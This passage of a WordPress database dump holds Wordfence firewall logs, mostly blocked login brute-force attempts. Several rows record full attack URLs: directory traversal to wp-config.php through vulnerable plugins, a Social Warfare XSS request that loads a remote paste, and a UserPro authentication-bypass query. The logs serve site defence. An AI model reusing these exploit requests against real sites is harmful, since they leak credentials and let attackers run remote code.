Injection','{\"learningMode\":0,\"failedRules\":\"380\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vd2Mvc3RvcmUvcHJvZHVjdHMvY29sbGVjdGlvbi1kYXRh\",\"path\":\"L3dwLWpzb24vd2Mvc3RvcmUvcHJvZHVjdHMvY29sbGVjdGlvbi1kYXRh\",\"category\":\"sqli\",\"ssl\":1}'),(11379,0.000000,1631511518.849407,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11380,1631511540.867866,1631511540.775100,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(11381,1631511535.150944,1631511535.057600,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(11382,1631511529.435428,1631511529.352000,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(11383,1631511525.966064,1631511525.872600,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(11384,0.000000,1631511577.929700,'\0\0\0\0\0\0\0\0\0\0����\0',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11385,0.000000,1631512671.629116,'\0\0\0\0\0\0\0\0\0\0���}7�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11386,0.000000,1631515040.984659,'\0\0\0\0\0\0\0\0\0\0����G�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11387,0.000000,1631516066.203654,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11388,0.000000,1631517217.253898,'\0\0\0\0\0\0\0\0\0\0���>}�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11389,0.000000,1631518257.974671,'\0\0\0\0\0\0\0\0\0\0���捫',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11390,0.000000,1631519314.078585,'\0\0\0\0\0\0\0\0\0\0�����_',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11391,0.000000,1631520531.011401,'\0\0\0\0\0\0\0\0\0\0��QX4\Z',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11392,0.000000,1631521614.743430,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11393,0.000000,1631524182.688065,'\0\0\0\0\0\0\0\0\0\0���1N',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11394,0.000000,1631540128.081813,'\0\0\0\0\0\0\0\0\0\0��F$R',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11395,0.000000,1631541050.910418,'\0\0\0\0\0\0\0\0\0\0��.�yo',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11396,0.000000,1631542100.655222,'\0\0\0\0\0\0\0\0\0\0���AL&',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11397,0.000000,1631543182.612916,'\0\0\0\0\0\0\0\0\0\0��-(��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11398,0.000000,1631544446.702891,'\0\0\0\0\0\0\0\0\0\0����7�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11399,0.000000,1631545837.874489,'\0\0\0\0\0\0\0\0\0\0��g�l',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11400,0.000000,1631547229.160074,'\0\0\0\0\0\0\0\0\0\0��/�\'',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11401,1631547551.289151,1631547551.193200,'\0\0\0\0\0\0\0\0\0\0��(W\n',0,403,0,0,0,'https://dogstardesign.co.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(11402,1631547558.178952,1631547558.103800,'\0\0\0\0\0\0\0\0\0\0��(W\n',0,403,0,0,0,'https://dogstardesign.co.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(11403,1631547572.454169,1631547572.365500,'\0\0\0\0\0\0\0\0\0\0��(W\n',0,403,0,0,0,'https://dogstardesign.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(11404,1631547603.913178,1631547603.838600,'\0\0\0\0\0\0\0\0\0\0��(W\n',0,403,0,0,0,'https://dogstardesign.co.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(11405,1631547773.637953,1631547773.550600,'\0\0\0\0\0\0\0\0\0\0��(W\n',0,403,0,0,0,'https://dogstardesign.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(11406,1631547766.176058,1631547766.088500,'\0\0\0\0\0\0\0\0\0\0��(W\n',0,403,0,0,0,'https://dogstardesign.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(11407,0.000000,1631549385.774108,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11408,0.000000,1631550617.319692,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11409,0.000000,1631551397.169720,'\0\0\0\0\0\0\0\0\0\0���7o',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11410,0.000000,1631554198.301055,'\0\0\0\0\0\0\0\0\0\0��QEˣ',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11411,0.000000,1631557592.630169,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11412,0.000000,1631563943.396571,'\0\0\0\0\0\0\0\0\0\0����F+',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11413,0.000000,1631570178.515975,'\0\0\0\0\0\0\0\0\0\0��N�(R',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','loginFailInvalidUsername',NULL,NULL),(11414,0.000000,1631571077.766631,'\0\0\0\0\0\0\0\0\0\0��-��^',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1905.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11415,0.000000,1631572718.328330,'\0\0\0\0\0\0\0\0\0\0����d�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11416,0.000000,1631572732.143199,'\0\0\0\0\0\0\0\0\0\0����G',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11417,0.000000,1631572741.926945,'\0\0\0\0\0\0\0\0\0\0����G',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11418,0.000000,1631572756.922252,'\0\0\0\0\0\0\0\0\0\0��� �',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11419,0.000000,1631572776.291898,'\0\0\0\0\0\0\0\0\0\0��q�tS',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11420,0.000000,1631572786.125519,'\0\0\0\0\0\0\0\0\0\0��q�tS',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11421,0.000000,1631572795.180622,'\0\0\0\0\0\0\0\0\0\0���z��',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11422,0.000000,1631576349.684541,'\0\0\0\0\0\0\0\0\0\0���o\0:',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11423,0.000000,1631577654.669479,'\0\0\0\0\0\0\0\0\0\0��I�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11424,0.000000,1631577657.545394,'\0\0\0\0\0\0\0\0\0\0��I�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11425,0.000000,1631577659.330110,'\0\0\0\0\0\0\0\0\0\0��I�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11426,0.000000,1631577661.217103,'\0\0\0\0\0\0\0\0\0\0��I�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11427,0.000000,1631577663.224969,'\0\0\0\0\0\0\0\0\0\0��I�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11428,0.000000,1631577665.016146,'\0\0\0\0\0\0\0\0\0\0��I�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11429,0.000000,1631577666.911262,'\0\0\0\0\0\0\0\0\0\0��I�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://www.dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(11430,0.000000,1631583387.402483,'\0\0\0\0\0\0\0\0\0\0��-��9',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2188.2 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11431,0.000000,1631588074.507437,'\0\0\0\0\0\0\0\0\0\0��[�F�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11432,0.000000,1631593399.200092,'\0\0\0\0\0\0\0\0\0\0��[�F�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11433,0.000000,1631604779.352738,'\0\0\0\0\0\0\0\0\0\0����f�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','https://www.google.com/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11434,0.000000,1631607770.223785,'\0\0\0\0\0\0\0\0\0\0����t\r',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11435,0.000000,1631608387.023323,'\0\0\0\0\0\0\0\0\0\0��k��\n',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11436,0.000000,1631608940.558290,'\0\0\0\0\0\0\0\0\0\0���c�X',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11437,0.000000,1631609448.643716,'\0\0\0\0\0\0\0\0\0\0���\n',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11438,0.000000,1631609917.311286,'\0\0\0\0\0\0\0\0\0\0��Ϛԛ',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11439,0.000000,1631610482.394215,'\0\0\0\0\0\0\0\0\0\0��PP��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11440,0.000000,1631610960.099991,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11441,0.000000,1631611433.594220,'\0\0\0\0\0\0\0\0\0\0��#��N',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11442,0.000000,1631611914.785612,'\0\0\0\0\0\0\0\0\0\0��\"}6�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11443,0.000000,1631612418.840472,'\0\0\0\0\0\0\0\0\0\0����E.',0,200,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(11444,0.000000,1631612886.920497,'\0\0\0\0\0\0\0\0\0\0��n��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11445,0.000000,1631613352.404383,'\0\0\0\0\0\0\0\0\0\0��[��O',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11446,0.000000,1631613799.887017,'\0\0\0\0\0\0\0\0\0\0���>L�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11447,0.000000,1631614256.590887,'\0\0\0\0\0\0\0\0\0\0��6\'iX',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11448,0.000000,1631614682.617397,'\0\0\0\0\0\0\0\0\0\0���ŃB',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11449,0.000000,1631615105.930526,'\0\0\0\0\0\0\0\0\0\0��E��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11450,0.000000,1631615565.586727,'\0\0\0\0\0\0\0\0\0\0��[��\r',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL);
/*!40000 ALTER TABLE `wp_wfhits` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfhoover`
--
DROP TABLE IF EXISTS `wp_wfhoover`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfhoover` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`owner` text DEFAULT NULL,
`host` text DEFAULT NULL,
`path` text DEFAULT NULL,
`hostKey` varbinary(124) DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `k2` (`hostKey`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfhoover`
--
LOCK TABLES `wp_wfhoover` WRITE;
/*!40000 ALTER TABLE `wp_wfhoover` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfhoover` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfissues`
--
DROP TABLE IF EXISTS `wp_wfissues`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfissues` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
